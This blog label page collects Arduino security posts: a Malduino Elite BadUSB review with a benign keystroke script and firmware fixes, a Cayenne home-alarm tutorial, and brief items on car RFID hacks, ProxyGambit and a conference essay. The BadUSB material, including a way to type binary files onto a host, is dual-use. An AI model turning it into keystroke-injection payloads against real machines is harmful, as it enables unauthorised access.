Posts with «security» label

Malduino Elite – First Impressions

A while back, I wrote an article about Malduino, an Arduino-based, open-source BadUSB device. I found the project interesting so I signed up for an Elite version and sure enough, the friendly postman dropped it off in my mail box last Friday, which means I got to play around with it over the weekend. For those who missed the article, Malduino is a USB device which is able to emulate a keyboard and inject keystrokes, among other things. When in a proper casing, it will just look like a USB flash drive. It’s like those things you see in the movies where a guy plugs in a device and it auto hacks the computer. It ships in two versions, Lite and Elite, both based on the ATmega32U4.

The Lite version is really small. Besides the USB connector, it only contains a switch, which allows the user to choose between running and programming mode, and an LED, which indicates when the script has finished running.

Original Malduino Elite sketch and Lite prototype

The Elite version is bigger and comes with a Micro-SD card reader and four DIP switches, which allow the user to choose which script to run from the card. It also has the LED, which indicates when a script has finished running. This allows the user to burn the firmware only once and then program the keystroke injection scripts that are stored on the Micro-SD card, in contrast to the Lite version, which needs to be flashed each time a user wants to run a different script.

These are the two Malduinos and because they are programmed straight from the Arduino IDE, every feature I just mentioned can be re-programmed, re-purposed or dropped altogether. You can buy one and just choose to use it like a ‘normal’ Arduino, although there are not a lot of pins to play around with. This freedom was one of the first things I liked about it and actually drove me to participate in the crowd-funding campaign. Read on for the full review.

The Hardware

Malduino Elite vs USB flash drive

So the Elite board arrived on schedule and I found myself some time to look at it. Despite being longer than the Lite version, it’s still quite small, measuring roughly 4.6 cm x 1.1 cm (around 1.8 in x 0.43 in), which you can easily adapt to an old USB case, although you’ll have to cut some holes for the DIP switches and the Micro-SD card. In the crowd-funding campaign, the original sketch was for a 3 DIP switch version but the final Elite has four, which I found nice. I plugged it in to an old computer, after some consideration about which firmware it could ship with and what it could do to my laptop, and sure enough a red LED appeared. And that was it. Nothing else.

After playing around with the switches and exercising some RTFM, I realised that the firmware it ships with is probably some sort of Q.C. test for the dips, which makes the Malduino output the numbers 1 to 4 (actually simulating a keypress 1 to 4), depending on which switches are ON. So far so good, it works and I’ve seen worse PCB boards than this one. The board has holes for six pins, which I did not trace to the micro-controller and I don’t know what they are for.

The Setup

Setting up the Malduino requires that you have the Arduino IDE installed and up to date. You’ll need to open up the board manager and install the Sparkfun boards since the Elite is programmed as a ‘Sparkfun Pro Micro’ running at 3.3 V and 8 MHz. Then you need to go to the Malduino Script Converter website, which serves several purposes:

  • It allows you to convert scripts between the Lite and Elite versions
  • It allows you to choose your keyboard layout language
  • It auto generates the Arduino project for you to import to the IDE

For the Elite version, just create a simple or even empty script to download the project, since when in ‘normal’ operation you will just flash the Malduino once and then use the Micro-SD card to store new scripts.

A note on flashing: if you are using a Debian-based distribution, you might come across some problems like I did and not be able to flash the device. Like the user on this most useful post, my modem-manager was trying to talk with the Malduino after every reset and confused AVRDUDE to death. The solution is to add udev rules to “/etc/udev/rules.d/77-mm-usb-device-blacklist-local.rules”, kudos to [socrim]:

ACTION!="add|change", GOTO="mm_usb_device_blacklist_local_end"
SUBSYSTEM!="usb", GOTO="mm_usb_device_blacklist_local_end"
ENV{DEVTYPE}!="usb_device", GOTO="mm_usb_device_blacklist_local_end"

ATTRS{idVendor}=="1b4f", ATTRS{idProduct}=="9204", ENV{ID_MM_DEVICE_IGNORE}="1"
ATTRS{idVendor}=="1b4f", ATTRS{idProduct}=="9203", ENV{ID_MM_DEVICE_IGNORE}="1"

LABEL="mm_usb_device_blacklist_local_end"

The Software

Since I’m running Linux, a quick shortcut to run a command is the ALT-F2 combination. So I script that into a file and save it to 1111.txt. The Elite searches the Micro-SD card for a file corresponding to the current dip switch state. Let’s say dip switches 2 and 4 are ON. In this case, the software tries to find the file named 0101.txt and parse its contents (as in dip switch order 1,2,3,4 and not the binary representation of the numbers 2 and 4). When it finishes, the red LED starts flashing quickly. My simple script was:

DELAY 2000
ALT F2
DELAY 1000
STRING xterm
DELAY 1000
ENTER
DELAY 1000
STRING id
DELAY 1000
ENTER

But it was not working. Almost all commands worked but the ALT-F2 combo was not functioning properly. Close, but no cigar. No ALT-F2, no run command window. I’ve already lazy-browsed the source code a bit because I really didn’t have a lot of time on my hands but I needed to figure this out. The offending code was this:

else if(equals(s,e,"F1",3)) Keyboard.press(KEY_F1);
else if(equals(s,e,"F2",3)) Keyboard.press(KEY_F2);
...
else if(equals(s,e,"F10",3)) Keyboard.press(KEY_F10);
else if(equals(s,e,"F11",3)) Keyboard.press(KEY_F11);

A custom equals function was receiving size 3 for the strings of the Function keys, like “F2”. It was ok for “F10”, “F11” and “F12”, but failed for the rest of the keys. Changing 3 to 2 did the trick, but my Portuguese keyboard layout started to interfere with other test scripts. So I changed the code to include PT and UK layouts, changing them in a #define at compile time.
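Why a hard-coded length of 3 breaks the two-character key names, as an added example that is not the Malduino firmware: `token_equals` is a hypothetical stand-in that assumes `equals(s, e, literal, len)` matches only when the token `[s, e)` is exactly `len` bytes long, and the key codes are constructed values. The fixed table derives each length from the literal itself so the two cannot drift apart.

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Constructed key codes for this example; not the Arduino Keyboard.h values. */
enum { K_NONE = 0, K_ALT = 1, K_F1 = 11, K_F2 = 12, K_F10 = 20, K_F11 = 21, K_F12 = 22 };

struct key_entry { const char *name; size_t len; int code; };

/* Assumed semantics of the firmware's equals(s, e, literal, len): the token
   [s, e) matches only if it is exactly len bytes long and equals the literal. */
static int token_equals(const char *s, const char *e, const char *lit, size_t len)
{
    return (size_t)(e - s) == len && memcmp(s, lit, len) == 0;
}

/* "Before": every function key carries a hand-written length of 3,
   as in the lines quoted in the article. */
static const struct key_entry BUGGY[] = {
    {"ALT", 3, K_ALT}, {"F1", 3, K_F1},   {"F2", 3, K_F2},
    {"F10", 3, K_F10}, {"F11", 3, K_F11}, {"F12", 3, K_F12},
};

/* "After": the length is computed from the literal at compile time. */
#define KEY(lit, code) { lit, sizeof(lit) - 1, code }
static const struct key_entry FIXED[] = {
    KEY("ALT", K_ALT), KEY("F1", K_F1),   KEY("F2", K_F2),
    KEY("F10", K_F10), KEY("F11", K_F11), KEY("F12", K_F12),
};
#define COUNT(t) (sizeof(t) / sizeof((t)[0]))

static int lookup(const struct key_entry *tab, size_t n, const char *s, const char *e)
{
    for (size_t i = 0; i < n; i++)
        if (token_equals(s, e, tab[i].name, tab[i].len))
            return tab[i].code;
    return K_NONE;
}

/* Key code of the index-th space-separated token on a script line:
   K_NONE if the token is not recognised, -1 if the line has fewer tokens. */
int combo_key(const struct key_entry *tab, size_t n, const char *line, size_t index)
{
    const char *s = line;
    for (size_t tok = 0; ; tok++) {
        while (*s == ' ') s++;
        if (*s == '\0') return -1;
        const char *e = s;
        while (*e != '\0' && *e != ' ') e++;
        if (tok == index) return lookup(tab, n, s, e);
        s = e;
    }
}

int main(void)
{
    const char *lines[] = { "ALT F2", "ALT F10" };
    for (size_t i = 0; i < COUNT(lines); i++)
        printf("%-8s buggy=%d fixed=%d\n", lines[i],
               combo_key(BUGGY, COUNT(BUGGY), lines[i], 1),
               combo_key(FIXED, COUNT(FIXED), lines[i], 1));
    return 0;
}
```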

It would be cool if it was possible to access the SD card from the computer as a regular USB volume. I don’t know exactly how feasible that is, but it does not come with the current firmware. I still wanted to be able to output the content of an arbitrary file on the SD card to the screen, so I added another script function called ECHOFILEHEX that outputs the content of a file in the SD card as escape characters. For example, if the file a.txt contains “AAA”, the script command ECHOFILEHEX a.txt would output “\x41\x41\x41”. This can be useful to echo binary files into printf or echo -e, in Linux hosts at least.

Meanwhile, I had some trouble reading the original code. You know, we all have different programming styles. Don’t get me wrong, I’ve been known to write some messed-up spaghetti code. I sometimes browse old projects looking for some libs or classes I coded and wonder ‘who the heck wrote this steaming pile of code?’ Me, it was me. Anyway, I started to change a bit here and there and ended up changing pretty much the entire code. That’s the beauty and the curse of open-source. If you’re curious you can check it out here.

Conclusion

All in all, and despite some bumps, I’m quite pleased with Malduino. It is what I expected: an open platform for BadUSB attacks that’s in its infancy. It’s awesome that we can all tinker with it, modify it, make it better or just make it suit our needs. I hope a real community can start so we can see its full potential emerge. My short list includes simulating other USB devices, better SD card management, and expanding the device via the unused pins. What would you add?

It’s a long way to go and a lot can go wrong, so good luck with the project [Seytonic]!


Filed under: Featured, reviews, security hacks

Arduino based Security Project Using Cayenne


 

Description

This is an Arduino based home security project that uses the power of "Cayenne" for extraordinary capabilities.

Cayenne Beta

Cayenne is a new IoT drag and drop platform originally released for the Raspberry Pi, but now available for Arduino. Cayenne makes the task of connecting your Arduino to the internet as simple as possible. All of the complexity of internet connectivity is hidden within the Cayenne library.

You can easily create a network of Arduinos and build an IoT system which can be managed and operated within the Cayenne dashboard. This dashboard is accessible through your browser or via the Cayenne smart phone app (on iOS or Android).

The feature I liked the most was the ability to change the position of sensors or actuators on the Arduino without having to re-upload Arduino code. I could manage the changed position from within the Cayenne platform. The other feature that I liked was the ability to set up actions based on custom triggers. You can use Cayenne to trigger a whole range of functions, for example: play a sound, move a motor, light up an LED, or send alert notifications via email or SMS.

Cayenne is in Beta at the moment, so there are a few minor bugs here and there, but overall - I give it a thumbs up - it is definitely worth checking out.
 

Here is a link to the Cayenne Beta Program: Cayenne Beta Link



              Source: myDevices Media Kit

 

Home Security Project Summary

In order to fully experience this new IoT platform, I decided to create a project to really put it through its paces. This is what my Security Project will need:

  1. It will use two Arduinos, one connected to the internet via an Ethernet shield, and the other via WIFI.
  2. Two detectors - a PIR sensor and a laser trip wire.
  3. If the sensors are tripped, the person has 10 seconds to present an RFID tag to the Grove RFID reader:
    • If a valid RFID tag is SUCCESSFULLY presented within the time limit, a nice personalised greeting will be played to that person using a Grove - Serial MP3 player
    • If a valid RFID tag FAILS to be presented within the time limit, an Alarm will sound, and I will be notified of the intrusion via an SMS alert.
  4. The Cayenne dashboard will show the status of the sensors, and I will have full control over my security system via the web interface (or smartphone app).
  5. The sensors will be attached to a different Arduino to that of the Grove MP3 player and the RFID tag reader, which means that there will have to be some level of communication between the two Arduinos. In fact, the cross communication will be vital to the success of this project.


 
 
 

Project Video



 
 
 
 

 

Flow Diagrams:

Main Flow Diagram

The following flow diagram shows the Security project process. It is a high level view of the decisions being made by each Arduino in response to various events.  


 

Triggers Flow Diagram

The following flow diagram aims to highlight the various triggers set up within Cayenne to get this Security system to work.  

 
 
 

Arduino IDE and Library Downloads

You will need an Arduino IDE to upload code to the Arduino and the Seeeduino Cloud.
Here is the link to the Arduino IDE: Arduino IDE - download location

The Cayenne service requires that you download and install the Cayenne Library into your Arduino IDE.
You can get the Cayenne Library from here: Cayenne Library File - Download


 

Cayenne Connectivity Setup

The Seeeduino Cloud needs to be prepared for use with Cayenne.
Normal operating/setup instructions can be found here: Seeeduino Cloud WIKI page
 
Once you have successfully connected Seeeduino Cloud to your WIFI network, you can add it to the Cayenne Dashboard by making the following selections from within the Cayenne Web application:

  1. Add New
  2. Device/Widget
  3. Microcontrollers
  4. Arduino
  5. Ensure Seeeduino Cloud is connected to WIFI network - then select the NEXT button
  6. Select - Arduino Yun: Built-in Ethernet - ticked
  7. Providing you have already installed the Cayenne library as described above - you should be able to copy and paste the code to the Arduino IDE and upload to the Seeeduino Cloud.
  8. If successful, you should see the Arduino Yun board appear within the Cayenne Dashboard. If not, then seek help within the Cayenne forum.


 

The Arduino UNO with WIZNET 5100 - Ethernet Shield also needs to be prepared with Cayenne

  1. Add New
  2. Device/Widget
  3. Microcontrollers
  4. Arduino
  5. Ensure Arduino is powered, and Ethernet shield is connected to your internet router via an Ethernet cable
  6. Select - Arduino Uno: Ethernet Shield W5100 - ticked
  7. Copy and paste the code to the Arduino IDE and upload to the Arduino UNO.
  8. If successful, you should see the Arduino Uno board appear within the Cayenne Dashboard. If not, then seek help within the Cayenne forum.

 


 
If you have the Ethernet shield with the WIZNET 5200 chip, then you may need to download a specific Ethernet library in addition to the Cayenne library.
 
Just follow the instructions within the Automatically generated sketch provided - when you select your specific Arduino/Ethernet/WIFI shield combination. If you need further instructions on connecting your device to Cayenne - then please visit the myDevices website for the online documentation.
 


 
 
 
 

ARDUINO CODE (1)


Code for Arduino UNO with Ethernet Shield:

The following code will need to be uploaded to the Arduino UNO:


 
 
 
 
 

ARDUINO CODE (2)


Code for Seeeduino Cloud:

The following code will need to be uploaded to the Seeeduino Cloud:


 
 
 
 

Fritzing diagram (1)


Fritzing diagram for Arduino UNO with Ethernet

Please click on the picture below for an enlarged version of this fritzing diagram


 
 
 
 

Fritzing diagram (2)


Fritzing diagram for Seeeduino Cloud

Please click on the picture below for an enlarged version of this fritzing diagram


 
 
 
 
 
 
 

Cayenne Dashboard Setup - GUI


The Arduino code only provides half of the functionality of this project. The Cayenne Dashboard needs to be set up to provide the rest of the functionality. The following instructions will show you how to add each of the widgets required for this Home Security project.


Arduino Ethernet - Master Switch

The master switch allows me to turn the security system on and off. When I turn the MASTER SWITCH ON, the laser beam will turn on, and the sensors will start monitoring the area for intruders. This widget is NOT associated with a physical switch/sensor on the Arduino - it uses virtual channel 0. We need to add the Master switch to the dashboard:


  1. Add New
  2. Device/Widget
  3. Actuators
  4. Generic
  5. Digital Output - Control a Digital Output
  6. Widget Name: Master On Off Switch
  7. Select Device: Arduino Ethernet
  8. Connectivity: Virtual
  9. Pin: V0
  10. Choose Widget: Button
  11. Choose Icon: Valve
  12. Step2: Add Actuator
We will add a trigger later to get this button to automatically turn the Laser beam on.


 
 
 

Arduino Ethernet - PIR Sensor

This sensor will be used to detect movement in the room. If a person walks into the room, this sensor will detect movement, and will trigger a message to be played on the Grove Serial MP3 player. The message will aim to get the person to identify themselves. They identify themselves by placing their RFID tag in close proximity to the Grove RFID reader. If the tag is valid, a "Welcome home" message is played on the Grove MP3 player. If a valid tag is not presented to the reader within 10 seconds, an Alarm will go off ("Alarm sound" played on Grove MP3 player.)

The PIR sensor is connected to digital Pin 6 of the Arduino; however, it is mapped to virtual pin 1 for better synchronisation with the Cayenne dashboard. This was done to capture ALL detections, as the PIR sensor could change from a LOW to HIGH and back to LOW state in between a Cayenne state check, and Cayenne could therefore miss this motion detection. Therefore, we need to assign the PIR sensor to a virtual channel in the following way:
  1. Add New
  2. Device/Widget
  3. Sensors
  4. Motion
  5. Digital Motion Sensor - Motion Detector
  6. Widget Name: PIR sensor
  7. Select Device: Arduino Ethernet
  8. Connectivity: Virtual
  9. Pin: V1
  10. Choose Widget: 2-State Display
  11. Choose Icon: Light
  12. Step2: Add Sensor
  13. Select Settings from the PhotoResistor
  14. Choose Display: Value
  15. Save
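
The latching described above, together with the 10-second tag window from the project summary, as an added example that is not the author's sketch: it is a single-device simplification in C, and the 1-second poll interval, 10 ms loop step and 100 ms PIR pulse are constructed assumptions. It shows a short PIR pulse being missed by polling the raw pin but held by the latch, and the alarm firing only when no valid tag arrives in time.

```c
#include <stdbool.h>
#include <stdint.h>
#include <stdio.h>

#define TAG_WINDOW_MS 10000u  /* 10 seconds to present an RFID tag (from the article) */
#define POLL_MS        1000u  /* assumed interval between dashboard state checks */

enum state { DISARMED, ARMED, AWAITING_TAG, ALARM };

struct alarm {
    enum state st;
    bool latch;         /* motion seen since the last poll */
    uint32_t deadline;  /* ms timestamp, valid only in AWAITING_TAG */
};

struct result { enum state final; int latched_hits; int raw_hits; };

void alarm_arm(struct alarm *a)
{
    a->st = ARMED;
    a->latch = false;
    a->deadline = 0;
}

/* Run on every loop pass with the raw PIR level and the current time. */
void alarm_sample(struct alarm *a, bool pir_high, uint32_t now)
{
    if (a->st == ARMED && pir_high) {
        a->latch = true;                   /* hold the event for the next poll */
        a->st = AWAITING_TAG;
        a->deadline = now + TAG_WINDOW_MS;
    } else if (a->st == AWAITING_TAG && (int32_t)(now - a->deadline) >= 0) {
        a->st = ALARM;                     /* window expired without a valid tag */
    }
}

/* What a state check sees on the virtual pin: read the latch, then clear it. */
bool alarm_poll(struct alarm *a)
{
    bool seen = a->latch;
    a->latch = false;
    return seen;
}

/* Only a valid tag inside the window switches the system off. */
void alarm_tag(struct alarm *a, bool valid)
{
    if (a->st == AWAITING_TAG && valid)
        a->st = DISARMED;
}

/* Constructed scenario: the PIR is high only from 1200 ms to 1299 ms and a
   tag is presented at tag_at (0 = never). Simulates 15 s in 10 ms steps. */
struct result run_scenario(uint32_t tag_at, bool tag_valid)
{
    struct alarm a;
    struct result r = { DISARMED, 0, 0 };
    alarm_arm(&a);
    for (uint32_t now = 0; now <= 15000; now += 10) {
        bool pir = (now >= 1200 && now < 1300);
        alarm_sample(&a, pir, now);
        if (tag_at != 0 && now == tag_at)
            alarm_tag(&a, tag_valid);
        if (now % POLL_MS == 0) {
            if (alarm_poll(&a)) r.latched_hits++;  /* latched virtual-pin value */
            if (pir) r.raw_hits++;                 /* polling the raw pin instead */
        }
    }
    r.final = a.st;
    return r;
}

int main(void)
{
    struct result ok = run_scenario(5000, true);
    struct result none = run_scenario(0, false);
    printf("valid tag at 5 s: state=%d latched=%d raw=%d\n",
           ok.final, ok.latched_hits, ok.raw_hits);
    printf("no tag:           state=%d latched=%d raw=%d\n",
           none.final, none.latched_hits, none.raw_hits);
    return 0;
}
```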

 
 
 

Arduino Ethernet - Photoresistor

This sensor will be used with the laser beam to create a laser tripwire. If the sensor detects a change in light levels (drops below the threshold), it will activate the laser trigger button on the dashboard. The person will then be required to identify themselves etc etc (similar to the motion detection by the PIR sensor). The photoresistor widget will display the raw analog reading from the sensor (connected to A2), but is associated with virtual channel 2. I used a virtual channel for more control over this sensor. To add the Photoresistor to the dashboard:

  1. Add New
  2. Device/Widget
  3. Sensors
  4. Luminosity
  5. Photoresistor - Luminosity sensor
  6. Widget Name: PhotoResistor
  7. Select Device: Arduino Ethernet
  8. Connectivity: Virtual
  9. Pin: V2
  10. Choose Widget: Value
  11. Choose Icon: Light
  12. Step2: Add Sensor


 
 
 

Arduino Ethernet - Laser Trigger

The laser trigger is just an indicator that someone tripped the laser beam. The state of this widget is used to notify the Seeeduino that a presence has been detected. This widget is associated with virtual pin 4 on the Arduino UNO with Ethernet.

  1. Add New
  2. Device/Widget
  3. Actuators
  4. Generic
  5. Digital Output - Control a Digital Output
  6. Widget Name: Laser Trigger
  7. Select Device: Arduino Ethernet
  8. Connectivity: Virtual
  9. Pin: V4
  10. Choose Widget: Button
  11. Choose Icon: Lock
  12. Step2: Add Actuator


 
 
 

Arduino Ethernet - Laser Threshold

The laser threshold is used to manually configure the light level at which the laser trigger will trip. When the photoresistor value drops below the threshold value, the laser trigger icon will activate. This allows the threshold value to be updated from the Cayenne dashboard, rather than having to manually adjust the value in the Arduino code. Also, this threshold can be set remotely, in that you don't have to be near the Arduino to change this value. A very useful feature of this Security system. This widget is associated with virtual pin 5 on the Arduino UNO with Ethernet.

  1. Add New
  2. Device/Widget
  3. Actuators
  4. Generic
  5. PWM Output - Control a PWM Output
  6. Widget Name: Laser Threshold
  7. Select Device: Arduino Ethernet
  8. Connectivity: Virtual
  9. Pin: V5
  10. Choose Widget: Slider
  11. Slider Min Value: 0
  12. Slider Max Value: 10
  13. Step2: Add Actuator
The max value of the slider is 10 - due to a current bug in the Cayenne software. Once resolved, this value (as well as the relevant Arduino code) will need to be updated.


 
 
 

Seeeduino Cloud - Presence Detected

The presence detected widget is there to notify the Seeeduino Cloud that a presence has been detected on the Arduino Uno with Ethernet shield. When the PIR sensor detects movement or if the laser tripwire is tripped, Cayenne will change the state of the Presence Detected widget from LOW to HIGH. This is used within the Seeeduino Cloud to trigger the message "Place your keys on the Mat". If a valid RFID tag is read by the Grove RFID reader, then this widget's state will change back from HIGH to LOW, and the MasterSwitch will be deactivated - turning the Security system off. This widget is associated with Virtual pin 6 on the Seeeduino Cloud.

  1. Add New
  2. Device/Widget
  3. Actuators
  4. Generic
  5. Digital Output - Control a Digital Output
  6. Widget Name: Presence Detected
  7. Select Device: Seeeduino Cloud
  8. Connectivity: Virtual
  9. Pin: V6
  10. Choose Widget: Button
  11. Choose Icon: Lock
  12. Step2: Add Actuator


 
 
 

Seeeduino Cloud - Intruder Alert

If a valid RFID tag is not read by the Grove RFID reader within 10 seconds of a presence detection event, an alarm will sound, and this widget will be activated. This will trigger a notification event - to notify me of the unauthorised intrusion - via SMS or email. I will also have a visual indicator on the Cayenne dashboard that an intrusion has taken place. This widget is associated with Virtual pin 7 on the Seeeduino Cloud.

  1. Add New
  2. Device/Widget
  3. Actuators
  4. Generic
  5. Digital Output - Control a Digital Output
  6. Widget Name: Laser Trigger
  7. Select Device: Seeeduino Cloud
  8. Connectivity: Virtual
  9. Pin: V7
  10. Choose Widget: Button
  11. Choose Icon: Thermometer
  12. Step2: Add Actuator


 
 
 

Seeeduino Cloud - Laser Beam

The laser beam widget was created to allow for full control over the laser beam. The laser beam can be turned on or off from the Cayenne dashboard, and is connected to digital pin 7 on the Seeeduino Cloud.


  1. Add New
  2. Device/Widget
  3. Actuators
  4. Light
  5. Light Switch - Turn On/Off a Light
  6. Widget Name: xLaser Beam
  7. Select Device: Seeeduino Cloud
  8. Connectivity: Digital
  9. Pin: D7
  10. Choose Widget: Button
  11. Choose Icon: Light
  12. Step2: Add Actuator


 
 
 
 

Cayenne Triggers

Now that all of the widgets have been added to the Dashboard, there is just one more step to complete the Security System. We need to set up the triggers. These triggers provide a level of automation that is easy to create within Cayenne, but would be very complicated otherwise. I set my triggers up as per the table below. Each row represents one of the triggers within my Cayenne dashboard. If you would like to see an example of how to add a trigger - please have a look at the video at the top of this tutorial.


 
 
 
 
 
 

Concluding comments

I used many different elements to put this home/office security project together - multiple Arduinos were connected to the internet, both controlled by a web/smart phone app, cross-communication/synchronisation between the Arduinos, and the use of multiple sensors and modules including a laser beam!
 
This was way more than just a simple PIR sense and alarm project. I now have a personalised greeting and reminder system when I walk in the door. Everyone else has their own personalised greeting. I can enable my Security System remotely, from two blocks away, and if I wanted to - I could enable it from the other side of the world. I know instantly when someone has entered my house/office.... with an SMS alert straight to my phone.
 
This project could easily be extended:

  1. Press a button on my phone to manually trigger/play a specific message/sound/song
  2. Take a picture of the intruder
  3. Introduce fire or leak detection as well
  4. Add other environmental sensors - Temperature / Humidity
  5. Connect it to lamp/light - creating a security light
I am sure you can think of more things I could do with this system. In fact, why don't you mention your ideas in the comments below.
 
Cayenne was instrumental in getting this project to work. I don't think I would know where to start if I had to do this project without this cool IoT platform. I think I will definitely be trying out a few more projects using Cayenne, and should you want to do the same, then please make sure to join Cayenne Beta:
 
Here is the link you need to get to the right place: Cayenne Beta Link

 


ScottC 30 Aug 15:42
alarm  arduino  arduinobasics  cayenne  laser  mp3  mydevices  pir  rfid  security  sms  tutorial  

Volkswagen Security Problems: Arduino Hack Reveals RFID Vulnerability

A team of researchers were able to unlock and start the ignition of Volkswagen cars with just $40 of electronic components.

Read more on MAKE

The post Volkswagen Security Problems: Arduino Hack Reveals RFID Vulnerability appeared first on Make: DIY Projects and Ideas for Makers.

Small Experiments in DIY Home Security

[Dann Albright] writes about some small experiments he’s done in home security.

He starts with the simplest, which is to purchase an off-the-shelf web camera and hook it up to software built to do the task. The first software he uses is the free, open source iSpy software. This adds basic features like motion detection, time stamping, logging, and an interface. He also explores other commercial options.

Next he delves a bit deeper. He starts by making a simple motion detector. When the Arduino detects motion using a PIR sensor, it gets a computer to text an alert. After that the tutorial begins to veer a little, and he adds his WiFi light bulbs to the mix. Now he can send an email and change the color of the lights.

We suppose that, from a security standpoint, it would really freak a burglar out if all the lights turned red when they walked into a room. Either way, there’s definitely a fun weekend project in playing around with all these systems.


Filed under: home hacks
Hack a Day 24 Apr 12:00

New Project: Make an Apple Watch Door Unlocker

Use an Apple Watch to automagically open doors at home or at work with a tap on your wrist.

Read more on MAKE

The post Make an Apple Watch Door Unlocker appeared first on Make: DIY Projects, How-Tos, Electronics, Crafts and Ideas for Makers.

ProxyGambit Better Than ProxyHam; Takes Coffee Shop WiFi Global

Last weekend saw the announcement of ProxyHam, a device that anonymizes Internet activity by jumping on WiFi from public libraries and cafes over a 900MHz radio link. The project mysteriously disappeared and was stricken from the DEFCON schedule. No one knows why, but we spent some time speculating on that and on what hardware was actually used in the undisclosed build.

[Samy Kamkar] has just improved on the ProxyHam concept with ProxyGambit, a device that decouples your location from your IP address. But [Samy]’s build isn’t limited to ProxyHam’s claimed two-mile range. ProxyGambit can work anywhere on the planet over a 2G connection, or up to 10km (6 miles) away through a line-of-sight point to point wireless link.

The GSM version of ProxyGambit uses two Adafruit FONA GSM breakout boards, two Arduinos, and two Raspberry Pis. The FONA board produces an outbound TCP connection over 2G. The Arduino serves as a serial connection over a reverse TCP tunnel and connects directly to the UART of a Raspberry Pi. The Pi is simply a network bridge at either end of the connection. By reverse tunneling a TCP connection through the ‘throwaway’ part of the build, [Samy] can get an Internet connection anywhere that has 2G service.

Although it’s just a proof of concept and should not be used by anyone who actually needs anonymity, the ProxyGambit does have a few advantages over the ProxyHam. It’s usable just about everywhere on the planet, and not just within two miles of the public WiFi access point. The source for ProxyGambit is also available, something that will never be said of the ProxyHam.


Filed under: security hacks

Secure and Track Your Bike with this Arduino-Based GPS Lock

Riding a bike can be fun, great exercise, and, if you live in a city conducive to it, a great mode of transportation. According to author Scott Bennett who lives in Vancouver BC, Canada, a city with a high bike theft rate, he “wanted to have some peace of mind […]

Read more on MAKE

The post Secure and Track Your Bike with this Arduino-Based GPS Lock appeared first on Make:.

Casa Jasmina and Bruce Sterling at Thingscon 2015

Bruce Sterling went to Thingscon conference with a keynote about Casa Jasmina and then published the following essay.

—————-

This is the third of my Casa Jasmina essays. It’s about the recent “ThingsCon” conference in Berlin, May 2015.

This remarkable event was the second “ThingsCon,” a new gathering which makes itself useful to the European hardware startup scene, especially “connected products” designers and builders from Berlin and London. “ThingsCon” took place in Berlin’s “Culture Brewery,” which is a huge, defunct beer factory, currently re-zoned for theaters, bars, restaurants and design retail.

Anybody who has seen the Garrone Foundry (which houses Toolbox Co-Working, Fab Lab Torino and Casa Jasmina), would surely recognize the “Culture Brewery.” It’s the same European story: the old industrial hulk remade for today’s culture-industry. So we found the ThingsCon venue to be pretty cozy, even though the stairs are of odd sizes, the huge, lofty rooms don’t fit together properly, the events and workshops are on different floors and mysteriously distant from one another, and there was excellent beer everywhere and tiny, crooked bathrooms stuck nowhere in particular. There’s something fun about this steampunk disorganization — if you’ve built a weird open-source Internet-of-Things device out of glued plywood and steel rods, it really fits that atmosphere.

ThingsCon is not a Maker Faire for the general public, and attending it is not cheap. ThingsCon is aimed at designers, developers, engineers, entrepreneurs and similar stakeholder-types from the technology ecosystem. The presentations were full of practical wisdom about commercial tech-product development: scaring up funding money, allocating time and resources, packaging, promotion, marketing, founder exit-strategies, angel investment, the issues common to people who might like to sit down for a serious talk with, say, Intel.

The organizers of ThingsCon are Peter Bihr, Simon Hoher, Emanuel Schwarz, Max Kruger, Sonja Heinen, Alexandra Deschamps-Sonsino, Brady Forrest, Louisa Heinrich, and Marcel Schouwenaar. As conference organizers go, they won’t win any prizes for sleek efficiency. However when it comes to the Internet of Things, these activists know plenty. At ThingsCon you can learn a lot in a hurry.

So: now that we understand what ThingsCon is about and who ThingsCon is meant to please, let’s confront some of their native ThingsCon problems, because they have lots of interesting issues.

The guy who delivered the first ThingsCon opening keynote, Warren Ellis, really understands their pains. Warren Ellis is pretty well known as a comic book writer, film scriptwriter and novelist, but he was also in the brain-trust of BERG, the legendary and now-dead London interaction-design firm. Warren Ellis grasps the many thorny difficulties of modern connected-product design.

Ellis delivered a sardonically funny rant, warning designers, engineers and manufacturers about the fierce wrath of genuine consumers. Consumers — (they’re the people who are supposed to buy Internet-of-Things products) — are a fickle and treacherous group. Consumers are never grateful for the hard work of designers and technicians. On the contrary, consumers are suspicious, endlessly demanding of customer support, and they resent most things they buy. The Internet-of-Things is even worse than traditional consumer capitalism, because interactive products don’t just sit there, they are invasive and intimate. People treasure their homes as a safe space in a harsh, competitive world, and they feel emotionally wounded when anything in their house betrays them.

Warren Ellis is an intelligent and erudite man, and he was telling the crowd the truth, but they were all laughing nervously because they can’t really believe what he says. It’s all true, but it’s important to understand this and still have some courage about it. If you invent and manufacture something, and it’s a commercial success and ten million people buy the product, of course your life is going to change. You won’t be a “Maker” alone in a garage any more, you’ll be an Internet multimillionaire with customer-support issues. Warren Ellis is right to urge people to think these things through: you shouldn’t dabble in technology and business unless you’re ready to face the consequences of getting what you want.

Barriers to entry in manufacturing are collapsing, so the old lines between a do-it-yourself Maker and a commercial industrialist are blurring. But this doesn’t solve old problems, it just creates interesting new ones. This was the lesson conveyed by Tina Aspiala. Before ThingsCon 2015, I had never heard of Tina Aspiala. Thanks to ThingsCon, I will pay attention to Tina Aspiala from now on.

Tina, who achieved some success with a product of hers, has become a Kickstarter patroness. Tina Aspiala spends a lot of time on Kickstarter and likes to give people some crowdfunding money just to see what happens. She told the crowd that results were mixed. Kickstarter is a funding platform, but some people on Kickstarter are crooks, they’re Kickstarter embezzlers. Other people want to be honest, but they flee in terror when they realize what the real world expects from real design and manufacturing. Others just have bad luck with their Kickstarter: they really wanted to do the work, but they broke a leg, or Dad died, or there was a divorce… that mishap wouldn’t stop FIAT or General Electric, but it does stop the Kickstarter team because they are few in number, while FIAT and General Electric have thousands of personnel.

Many Kickstarter projects get built, despite the host of problems in shipping, supply chains, material costs and manufacturing — but that doesn’t end the story. The product might be workable, but just not much good. The product might do what is promised, but the thing that the product does is only interesting once or twice, not useful in daily life. It’s a “gonzo product” (in the term created by Alexandra Deschamps-Sonsino), because it physically works and it does something, but the thing it does is eccentric and weird, so it has no commercial potential or mass appeal.

Why do we have “gonzo products” nowadays? It’s because (as Tina Aspiala pointed out), cheap electronic components make new combinations easy. Projectors, motors, sensors, cameras, processors and various wireless connectivity chips are all drastically cheaper, so product development becomes like a card game, when any gambler can connect X with Y and add some Z, then hope for a jackpot payoff.

